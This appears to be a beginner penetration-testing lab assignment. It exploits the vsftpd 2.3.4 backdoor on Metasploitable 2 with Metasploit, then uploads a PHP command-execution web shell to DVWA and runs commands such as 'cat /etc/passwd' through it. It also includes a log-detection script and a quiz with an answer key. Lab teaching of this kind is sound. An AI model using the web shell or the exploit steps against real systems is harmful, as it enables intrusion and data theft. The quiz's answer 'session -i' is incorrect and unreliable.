Beginner Metasploit Assignment: Simple Exploration Tasks
Objective:
Your task is to exploit a vulnerability in the target system (Metasploitable 2) using a
backdoor. Once successful, you will gain access to the system and perform basic
exploration tasks to demonstrate control over the system. Before exploitation,
perform a reconnaissance of the target system to gather information about the
services running on it.
Task 1: Perform Reconnaissance of the Target System
Before you exploit the system, you need to gather information about the services
running on the target. You’ll use basic reconnaissance techniques to identify any
vulnerabilities.
Scan the Target System:
Use tools like nmap to scan the target system (Metasploitable 2) for open ports and
running services.
Command:
nmap -sV 192.168.127.129
Explanation:
nmap -sV 192.168.127.129: This command scans the IP address 192.168.127.129
(replace with the IP of your Metasploitable 2 machine) and identifies the services
running on the open ports.
Expected Output: You will see a list of open ports and services running on the
system. For example:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1
This shows that an FTP service is running on port 21, and that it is vsftpd 2.3.4,
a vulnerable version.
Task 2: Access the Target System
Exploit the Target System: Now that you've identified the vulnerable service, use a
Metasploit module to exploit the system and gain access via a backdoor.
Command:
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.127.129
run
Explanation:
msfconsole: Starts the Metasploit framework.
use exploit/unix/ftp/vsftpd_234_backdoor: Selects the Metasploit module
that targets the vsftpd 2.3.4 backdoor vulnerability.
set RHOST 192.168.127.129: Sets the target machine’s IP address.
run: Executes the exploit.
Expected Output: Once the exploit runs successfully, you should see a message like
this:
Command shell session 1 opened (your-kali-ip:port -> 192.168.127.129:port)
This indicates you've gained access to the target system.
Task 3: Check the Current User
Verify the User: Once you have access to the system, check which user you are
logged in as.
Command:
whoami
Explanation:
whoami: This command displays the current user logged into the system.
Expected Output: You should see root if the exploit worked successfully.
Example output:
root
Task 4: Create a Simple File to Show You Can Write to the System
Create a File: Create a simple text file with a message to show you have write access
to the system.
Command:
echo "You have successfully exploited the system!" > /root/exploit_success.txt
Explanation:
echo "You have successfully exploited the system!": Prints the specified
message.
> /root/exploit_success.txt: Writes the output into a file located at
/root/exploit_success.txt.
Check the Contents of the File: To confirm that the file was created and contains the
correct message, use the following command:
Command:
cat /root/exploit_success.txt
Explanation:
cat /root/exploit_success.txt: Displays the contents of the file you just created.
Expected Output: You should see the message:
You have successfully exploited the system!
Assignment: Hacking DVWA by Uploading a Malicious File
What is DVWA and Why Are We Using It?
DVWA stands for Damn Vulnerable Web Application.
It's a purposely weak website made for practice. You can use it to learn how hackers
attack websites without breaking the law.
We use DVWA because:
It's safe — it runs in your local lab.
It includes many common website flaws (like bad file uploads, SQL injection, etc.).
You get to learn how hackers break things so you can learn how to protect them.
What’s the Goal of This Assignment?
You’ll learn:
How to find if a website is running.
How to upload a fake file (a web shell) that lets you control the server.
How to run commands on the victim machine using just your browser.
Step 1: Check if the Target Has a Website Running
What Are We Doing?
We’re using a tool called nmap to check if the victim computer has a website
running on port 80 (the normal port for websites).
✅ Command to Run in Terminal:
nmap -p 80 -sV 192.168.127.129
-p 80: only check website port
-sV: find what version the website server is using
✅ What You Should See:
80/tcp open http Apache httpd 2.2.8 (Ubuntu)
This means the website is working and using Apache as the server.
Open this in your browser:
http://192.168.127.129/dvwa
Step 2: Set Up DVWA for Hacking
What To Do:
Open browser and go to:
http://192.168.127.129/dvwa
Login with:
Username: admin
Password: password
On the left, click DVWA Security.
Change Security Level to "Low" and click Submit.
This makes hacking easier for practice.
Now click File Upload in the menu.
Step 3: Create a Fake PHP Script to Upload (Web Shell)
We’ll make a small PHP file that lets you run commands on the target.
✅ Command to Make It:
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
This creates a file called shell.php with code that:
Runs any command you send in the browser (like ls, whoami, etc.)
✅ Check if It Worked:
cat shell.php
You should see:
<?php system($_GET['cmd']); ?>
Step 4: Upload That PHP File to the DVWA Website
Go back to File Upload in DVWA.
Click Browse, pick your shell.php file.
Click Upload.
✅ What You Should See:
../../hackable/uploads/shell.php successfully uploaded!
This means your file is now on the server and can be used.
⚔️ Step 5: Use the PHP Web Shell to Hack the Target
Now we use our browser to send commands to the server through our uploaded file.
✅ Example:
Open this in browser:
http://192.168.127.129/dvwa/hackable/uploads/shell.php?cmd=whoami
What You Should See:
www-data
This shows you’re running commands on the target machine, as the website user.
Try These Other Commands Too
📌 What You Want to Do | 🌐 Link to Use
See files in folder | http://192.168.127.129/dvwa/hackable/uploads/shell.php?cmd=ls
Check OS info | http://192.168.127.129/dvwa/hackable/uploads/shell.php?cmd=uname -a
Find your location on server | http://192.168.127.129/dvwa/hackable/uploads/shell.php?cmd=pwd
See user accounts | http://192.168.127.129/dvwa/hackable/uploads/shell.php?cmd=cat /etc/passwd
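Seen from the server side, every request in Step 5 leaves a line in the Apache access log. The following added example (not part of the original assignment) flags requests that execute a script from the upload directory; the log lines, their format (Apache's combined log format is assumed) and the client address 192.168.127.128 are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines for illustration (not real captures).
# 192.168.127.128 is an assumed address for the lab's attacking machine.
SAMPLE_LOG = """\
192.168.127.128 - - [10/May/2025:10:01:02 +0000] "GET /dvwa/hackable/uploads/shell.php?cmd=whoami HTTP/1.1" 200 9 "-" "Mozilla/5.0"
192.168.127.128 - - [10/May/2025:10:01:09 +0000] "GET /dvwa/hackable/uploads/shell.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1581 "-" "Mozilla/5.0"
192.168.127.128 - - [10/May/2025:10:02:00 +0000] "GET /dvwa/hackable/uploads/dvwa_email.png HTTP/1.1" 200 667 "-" "Mozilla/5.0"
192.168.127.128 - - [10/May/2025:10:02:30 +0000] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
192.168.127.128 - - [10/May/2025:10:03:00 +0000] "GET /dvwa/index.php?page=home HTTP/1.1" 200 4500 "-" "Mozilla/5.0"
"""

# Captures: client, timestamp, method, request target, status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_DIR = "/hackable/uploads/"  # upload location shown in Step 4
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def find_upload_script_hits(log_text):
    """Return requests that executed a server-side script from the upload dir."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        # An upload directory should only ever serve static files, so any
        # script request there is suspicious whatever its parameters are.
        if UPLOAD_DIR not in url.path or not SCRIPT_EXT.search(url.path):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        params = {name: values[0] for name, values in query.items()}
        hits.append({"client": client, "time": when, "method": method,
                     "path": url.path, "status": int(status), "params": params})
    return hits


if __name__ == "__main__":
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["path"], hit["params"])
```

The rule keys on the script extension inside the upload path rather than on the parameter name, so it still fires if the parameter is renamed. Serving the upload directory with script execution disabled removes the condition it looks for.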
Final Thoughts
You just:
Found a running website
Logged into DVWA
Changed its settings to make hacking easy
Uploaded a fake file that lets you control the server
Ran commands on another machine from your browser!
1. Which command is used to start Metasploit?
a) msfconsole
b) start msfconsole
c) metasploit
d) launch msf
Answer: a) msfconsole
2. Which command is used to search for an exploit in Metasploit?
a) search <exploit_name>
b) find <exploit_name>
c) locate <exploit_name>
d) search for <exploit_name>
Answer: a) search <exploit_name>
3. What does the command use do in Metasploit?
a) Starts an exploit
b) Loads an exploit module
c) Displays a list of available payloads
d) Scans for open ports
Answer: b) Loads an exploit module
4. What is the correct command to set a specific option like the target IP address in Metasploit?
a) set RHOST <IP_address>
b) config RHOST <IP_address>
c) target <IP_address>
d) set TARGET <IP_address>
Answer: a) set RHOST <IP_address>
5. Which command in Metasploit is used to show the current configuration options?
a) show settings
b) show options
c) display config
d) show config
Answer: b) show options
6. Which command is used to launch an exploit in Metasploit?
a) run exploit
b) exploit
c) execute
d) start exploit
Answer: b) exploit
7. How can you check the payloads compatible with a specific exploit in Metasploit?
a) show payloads
b) show compatible
c) list payloads
d) display payloads
Answer: a) show payloads
8. What command is used to interact with an active session in Metasploit?
a) interact <session_number>
b) session -i <session_number>
c) session <session_number>
d) connect <session_number>
Answer: b) session -i <session_number>
9. Which command in Metasploit is used to display all the available exploits?
a) show exploits
b) list exploits
c) search exploits
d) display all exploits
Answer: a) show exploits
10. Which command is used to exit Metasploit's session?
a) quit
b) exit
c) close
d) end
Answer: b) exit